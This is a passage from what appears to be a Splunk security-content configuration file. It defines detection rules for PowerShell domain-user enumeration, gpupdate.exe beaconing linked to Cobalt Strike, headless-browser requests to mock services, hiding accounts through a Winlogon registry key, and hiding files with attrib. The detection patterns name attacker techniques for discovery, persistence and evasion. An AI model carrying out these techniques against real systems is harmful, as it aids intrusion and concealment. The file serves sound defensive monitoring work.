command-line arguments utilized to query for domain users. The `Get-WmiObject` commandlet combined with the `-class ds_user` parameter can be used to return the full list of users in a Windows domain. Red Teams and adversaries alike may leverage WMI in this case, using PowerShell, to enumerate domain users for situational awareness and Active Directory Discovery. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.002", "T1087"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for the execution of `powershell.exe` with command-line arguments utilized to query for domain users. The `Get-WmiObject` commandlet combined with the `-class ds_user` parameter can be used to return the full list of users in a Windows domain. Red Teams and adversaries alike may leverage WMI in this case, using PowerShell, to enumerate domain users for situational awareness and Active Directory Discovery. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting. action.escu.creation_date = 2021-08-24 action.escu.modification_date = 2021-08-24 action.escu.confidence = high action.escu.full_search_name = ESCU - GetWmiObject DS User with PowerShell - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Discovery"] action.risk = 1 action.risk.param._risk_message = an instance of process $process_name$ with commandline $process$ in $dest$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - GetWmiObject DS User with PowerShell - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.002", "T1087"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic looks for the execution of `powershell.exe` with command-line arguments utilized to query for domain users. The `Get-WmiObject` commandlet combined with the `-class ds_user` parameter can be used to return the full list of users in a Windows domain. Red Teams and adversaries alike may leverage WMI in this case, using PowerShell, to enumerate domain users for situational awareness and Active Directory Discovery. action.notable.param.rule_title = GetWmiObject DS User with PowerShell action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="cmd.exe" OR Processes.process_name="powershell*") AND Processes.process = "*get-wmiobject*" AND Processes.process = "*ds_user*" AND Processes.process = "*root\\directory\\ldap*" AND Processes.process = "*-namespace*" by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `getwmiobject_ds_user_with_powershell_filter` [ESCU - GetWmiObject DS User with PowerShell Script Block - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-WmiObject` commandlet. The `DS_User` class parameter leverages WMI to query for all domain users. Red Teams and adversaries may leverage this commandlet to enumerate domain users for situational awareness and Active Directory Discovery. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.002", "T1087"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-WmiObject` commandlet. The `DS_User` class parameter leverages WMI to query for all domain users. Red Teams and adversaries may leverage this commandlet to enumerate domain users for situational awareness and Active Directory Discovery. action.escu.how_to_implement = The following Hunting analytic requires PowerShell operational logs to be imported. Modify the powershell macro as needed to match the sourcetype or add index. This analytic is specific to 4104, or PowerShell Script Block Logging. action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting. action.escu.creation_date = 2023-11-07 action.escu.modification_date = 2023-11-07 action.escu.confidence = high action.escu.full_search_name = ESCU - GetWmiObject DS User with PowerShell Script Block - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Active Directory Discovery"] action.risk = 1 action.risk.param._risk_message = powershell process having commandline for user enumeration detected on host - $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - GetWmiObject DS User with PowerShell Script Block - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.002", "T1087"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-WmiObject` commandlet. The `DS_User` class parameter leverages WMI to query for all domain users. Red Teams and adversaries may leverage this commandlet to enumerate domain users for situational awareness and Active Directory Discovery. action.notable.param.rule_title = GetWmiObject DS User with PowerShell Script Block action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 ScriptBlockText = "*get-wmiobject*" ScriptBlockText = "*ds_user*" ScriptBlockText = "*-namespace*" ScriptBlockText = "*root\\directory\\ldap*" | stats count min(_time) as firstTime max(_time) as lastTime by Opcode Computer UserID EventCode ScriptBlockText | rename Computer as dest | rename UserID as user| `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `getwmiobject_ds_user_with_powershell_script_block_filter` [ESCU - GetWmiObject User Account with PowerShell - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for the execution of `powershell.exe` with command-line arguments utilized to query local users. The `Get-WmiObject` commandlet combined with the `Win32_UserAccount` parameter is used to return a list of all local users. Red Teams and adversaries may leverage this commandlet to enumerate users for situational awareness and Active Directory Discovery. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087", "T1087.001"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for the execution of `powershell.exe` with command-line arguments utilized to query local users. The `Get-WmiObject` commandlet combined with the `Win32_UserAccount` parameter is used to return a list of all local users. Red Teams and adversaries may leverage this commandlet to enumerate users for situational awareness and Active Directory Discovery. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators or power users may use this PowerShell commandlet for troubleshooting. action.escu.creation_date = 2023-04-05 action.escu.modification_date = 2023-04-05 action.escu.confidence = high action.escu.full_search_name = ESCU - GetWmiObject User Account with PowerShell - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Winter Vivern", "Active Directory Discovery"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - GetWmiObject User Account with PowerShell - Rule action.correlationsearch.annotations = {"analytic_story": ["Winter Vivern", "Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087", "T1087.001"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="powershell.exe") (Processes.process=*Get-WmiObject* AND Processes.process=*Win32_UserAccount*) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `getwmiobject_user_account_with_powershell_filter` [ESCU - GetWmiObject User Account with PowerShell Script Block - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-WmiObject` commandlet used with specific parameters. The `Win32_UserAccount` parameter is used to return a list of all local users. Red Teams and adversaries may leverage this commandlet to enumerate users for situational awareness and Active Directory Discovery. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1087", "T1087.001", "T1059.001"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-WmiObject` commandlet used with specific parameters. The `Win32_UserAccount` parameter is used to return a list of all local users. Red Teams and adversaries may leverage this commandlet to enumerate users for situational awareness and Active Directory Discovery. action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell. action.escu.known_false_positives = Administrators or power users may use this PowerShell commandlet for troubleshooting. action.escu.creation_date = 2023-04-05 action.escu.modification_date = 2023-04-05 action.escu.confidence = high action.escu.full_search_name = ESCU - GetWmiObject User Account with PowerShell Script Block - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Winter Vivern", "Active Directory Discovery", "Malicious PowerShell"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - GetWmiObject User Account with PowerShell Script Block - Rule action.correlationsearch.annotations = {"analytic_story": ["Winter Vivern", "Active Directory Discovery", "Malicious PowerShell"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1087", "T1087.001", "T1059.001"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 (ScriptBlockText="*Get-WmiObject*" AND ScriptBlockText="*Win32_UserAccount*") | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer UserID | `security_content_ctime(firstTime)` | `getwmiobject_user_account_with_powershell_script_block_filter` [ESCU - GPUpdate with no Command Line Arguments with Network - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies gpupdate.exe with no command line arguments and with a network connection. It is unusual for gpupdate.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, triage any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. gpupdate.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1055"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint", "Network_Traffic"] action.escu.eli5 = The following analytic identifies gpupdate.exe with no command line arguments and with a network connection. It is unusual for gpupdate.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, triage any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. gpupdate.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Limited false positives may be present in small environments. Tuning may be required based on parent process. action.escu.creation_date = 2023-07-10 action.escu.modification_date = 2023-07-10 action.escu.confidence = high action.escu.full_search_name = ESCU - GPUpdate with no Command Line Arguments with Network - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["BlackByte Ransomware", "Cobalt Strike", "Graceful Wipe Out Attack"] action.risk = 1 action.risk.param._risk_message = Process gpupdate.exe with parent_process $parent_process_name$ is executed on $dest$ by user $user$, followed by an outbound network connection to $C2$ on port $dest_port$. This behaviour is seen with cobaltstrike. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 81}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 81}, {"threat_object_field": "parent_process_name", "threat_object_type": "process"}, {"threat_object_field": "C2", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - GPUpdate with no Command Line Arguments with Network - Rule action.correlationsearch.annotations = {"analytic_story": ["BlackByte Ransomware", "Cobalt Strike", "Graceful Wipe Out Attack"], "cis20": ["CIS 10"], "confidence": 90, "impact": 90, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1055"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies gpupdate.exe with no command line arguments and with a network connection. It is unusual for gpupdate.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, triage any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. gpupdate.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. action.notable.param.rule_title = GPUpdate with no Command Line Arguments with Network action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where Processes.process_name=gpupdate.exe by _time span=1h Processes.process_id Processes.process_name Processes.dest Processes.user Processes.process_path Processes.process Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | regex process="(?i)(gpupdate\.exe.{0,4}$)"| join process_id [| tstats `security_content_summariesonly` count FROM datamodel=Network_Traffic.All_Traffic where All_Traffic.dest_port != 0 by All_Traffic.process_id All_Traffic.dest All_Traffic.dest_port | `drop_dm_object_name(All_Traffic)` | rename dest as C2 ] | table _time user dest parent_process_name process_name process_path process process_id dest_port C2 | `gpupdate_with_no_command_line_arguments_with_network_filter` [ESCU - Headless Browser Mockbin or Mocky Request - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies headless browser activity accessing mockbin.org or mocky.io. Mockbin.org and mocky.io are web services that allow users to mock HTTP requests and responses. The detection is based on the presence of "--headless" and "--disable-gpu" command line arguments which are commonly used in headless browsing and the presence of mockbin.org or mocky.io in the process. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1564.003"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies headless browser activity accessing mockbin.org or mocky.io. Mockbin.org and mocky.io are web services that allow users to mock HTTP requests and responses. The detection is based on the presence of "--headless" and "--disable-gpu" command line arguments which are commonly used in headless browsing and the presence of mockbin.org or mocky.io in the process. action.escu.how_to_implement = To successfully implement this search you need to be ingesting information on process that include the name of the process responsible for the changes from your endpoints into the `Endpoint` datamodel in the `Processes` node. In addition, confirm the latest CIM App 4.20 or higher is installed and the latest TA for the endpoint product. action.escu.known_false_positives = False positives are not expected with this detection, unless within the organization there is a legitimate need for headless browsing accessing mockbin.org or mocky.io. action.escu.creation_date = 2023-09-11 action.escu.modification_date = 2023-09-11 action.escu.confidence = high action.escu.full_search_name = ESCU - Headless Browser Mockbin or Mocky Request - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Forest Blizzard"] action.risk = 1 action.risk.param._risk_message = Headless browser activity accessing mockbin.org or mocky.io detected on $dest$ by $user$. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 56}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Headless Browser Mockbin or Mocky Request - Rule action.correlationsearch.annotations = {"analytic_story": ["Forest Blizzard"], "cis20": ["CIS 10"], "confidence": 70, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1564.003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies headless browser activity accessing mockbin.org or mocky.io. Mockbin.org and mocky.io are web services that allow users to mock HTTP requests and responses. The detection is based on the presence of "--headless" and "--disable-gpu" command line arguments which are commonly used in headless browsing and the presence of mockbin.org or mocky.io in the process. action.notable.param.rule_title = Headless Browser Mockbin or Mocky Request action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process="*--headless*" AND Processes.process="*--disable-gpu*" AND (Processes.process="*mockbin.org/*" OR Processes.process="*mocky.io/*")) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `headless_browser_mockbin_or_mocky_request_filter` [ESCU - Headless Browser Usage - Rule] action.escu = 0 action.escu.enabled = 1 description = The following hunting analytic is designed to detect the usage of headless browsers in an organization. Headless browsers are web browsers without a graphical user interface and are operated via a command line interface or network requests. They are often used for automating tasks but can also be utilized by adversaries for malicious activities such as web scraping, automated testing, and performing actions on web pages without detection. The detection is based on the presence of "--headless" and "--disable-gpu" command line arguments which are commonly used in headless browsing. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1564.003"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following hunting analytic is designed to detect the usage of headless browsers in an organization. Headless browsers are web browsers without a graphical user interface and are operated via a command line interface or network requests. They are often used for automating tasks but can also be utilized by adversaries for malicious activities such as web scraping, automated testing, and performing actions on web pages without detection. The detection is based on the presence of "--headless" and "--disable-gpu" command line arguments which are commonly used in headless browsing. action.escu.how_to_implement = To successfully implement this search you need to be ingesting information on process that include the name of the process responsible for the changes from your endpoints into the `Endpoint` datamodel in the `Processes` node. In addition, confirm the latest CIM App 4.20 or higher is installed and the latest TA for the endpoint product. action.escu.known_false_positives = This hunting analytic is meant to assist with baselining and understanding headless browsing in use. Filter as needed. action.escu.creation_date = 2023-09-08 action.escu.modification_date = 2023-09-08 action.escu.confidence = high action.escu.full_search_name = ESCU - Headless Browser Usage - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Forest Blizzard"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Headless Browser Usage - Rule action.correlationsearch.annotations = {"analytic_story": ["Forest Blizzard"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1564.003"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process="*--headless*" AND Processes.process="*--disable-gpu*") by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| `headless_browser_usage_filter` [ESCU - Hide User Account From Sign-In Screen - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies a suspicious registry modification to hide a user account on the Windows Login screen. This technique was seen in some tradecraft where the adversary will create a hidden user account with Admin privileges in login screen to avoid noticing by the user that they already compromise and to persist on that said machine. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic identifies a suspicious registry modification to hide a user account on the Windows Login screen. This technique was seen in some tradecraft where the adversary will create a hidden user account with Admin privileges in login screen to avoid noticing by the user that they already compromise and to persist on that said machine. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the offical Sysmon TA. https://splunkbase.splunk.com/app/5709 action.escu.known_false_positives = Unknown. Filter as needed. action.escu.creation_date = 2023-04-27 action.escu.modification_date = 2023-04-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Hide User Account From Sign-In Screen - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["XMRig", "Windows Registry Abuse", "Azorult", "Warzone RAT"] action.risk = 1 action.risk.param._risk_message = Suspicious registry modification ($registry_value_name$) which is used go hide a user account on the Windows Login screen detected on $dest$ executed by $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 72}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 72}, {"risk_object_field": "registry_value_name", "risk_object_type": "other", "risk_score": 72}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Hide User Account From Sign-In Screen - Rule action.correlationsearch.annotations = {"analytic_story": ["XMRig", "Windows Registry Abuse", "Azorult", "Warzone RAT"], "cis20": ["CIS 10"], "confidence": 80, "impact": 90, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic identifies a suspicious registry modification to hide a user account on the Windows Login screen. This technique was seen in some tradecraft where the adversary will create a hidden user account with Admin privileges in login screen to avoid noticing by the user that they already compromise and to persist on that said machine. action.notable.param.rule_title = Hide User Account From Sign-In Screen action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path="*\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist*" AND Registry.registry_value_data = "0x00000000") BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `hide_user_account_from_sign_in_screen_filter` [ESCU - Hiding Files And Directories With Attrib exe - Rule] action.escu = 0 action.escu.enabled = 1 description = Attackers leverage an existing Windows binary, attrib.exe, to mark specific as hidden by using specific flags so that the victim does not see the file. The search looks for specific command-line arguments to detect the use of attrib.exe to hide files. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1222", "T1222.001"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = Attackers leverage an existing Windows binary, attrib.exe, to mark specific as hidden by using specific flags so that the victim does not see the file. The search looks for specific command-line arguments to detect the use of attrib.exe to hide files. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Some applications and users may legitimately use attrib.exe to interact with the files. action.escu.creation_date = 2024-01-01 action.escu.modification_date = 2024-01-01 action.escu.confidence = high action.escu.full_search_name = ESCU - Hiding Files And Directories With Attrib exe - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Defense Evasion Tactics", "Windows Persistence Techniques", "Azorult"] action.risk = 1 action.risk.param._risk_message = Attrib.exe with +h flag to hide files on $dest$ executed by $user$ is detected. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 72}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 72}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Hiding Files And Directories With Attrib exe - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Defense Evasion Tactics", "Windows Persistence Techniques", "Azorult"], "cis20": ["CIS 10"], "confidence": 80, "impact": 90, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1222", "T1222.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = Attackers leverage an existing Windows binary, attrib.exe, to mark specific as hidden by using specific flags so that the victim does not see the file. The search looks for specific command-line arguments to detect the use of attrib.exe to hide files. action.notable.param.rule_title = Hiding Files And Directories With Attrib exe action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) values(Processes.process) as process max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=attrib.exe (Processes.process=*+h*) by Processes.parent_process_name Processes.process_name Processes.user Processes.dest | `drop_dm_object_name("Processes")` | `security_content_ctime(firstTime)`|`security_content_ctime(lastTime)`| `hiding_files_and_directories_with_attrib_exe_filter` [ESCU - High Frequency Copy Of Files In Network Share - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is to detect a suspicious high frequency copying/moving of files in network share as part of information sabotage. This anomaly event can be a good indicator of insider trying to sabotage data by transfering classified or internal files within network share to exfitrate it after or to lure evidence of insider attack to other user. This behavior may catch several noise if network share is a common place for classified or internal document processing. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1537"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This analytic is to detect a suspicious high 